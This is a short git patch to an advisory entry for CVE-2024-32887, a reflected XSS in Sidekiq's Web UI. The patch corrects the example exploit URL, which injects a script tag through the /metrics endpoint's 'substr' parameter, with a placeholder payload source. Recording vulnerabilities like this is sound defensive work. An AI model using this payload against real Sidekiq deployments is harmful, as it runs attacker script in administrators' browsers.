From e97ec3fecb8c15a86ac15b55ecfdc0e61142c366 Mon Sep 17 00:00:00 2001 From: Postmodern Date: Sat, 27 Apr 2024 10:51:58 -0700 Subject: [PATCH] Correct example reflected XSS exploit URL. --- gems/sidekiq/CVE-2024-32887.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/gems/sidekiq/CVE-2024-32887.yml b/gems/sidekiq/CVE-2024-32887.yml index 09be1c5f04..4f2876376d 100644 --- a/gems/sidekiq/CVE-2024-32887.yml +++ b/gems/sidekiq/CVE-2024-32887.yml @@ -9,7 +9,7 @@ description: | Reflected XSS in Sidekiq Web UI via the `/metrics` HTTP end-point and the `substr` query param: - https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload} + https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}%22%20/%3E cvss_v3: 5.5 unaffected_versions: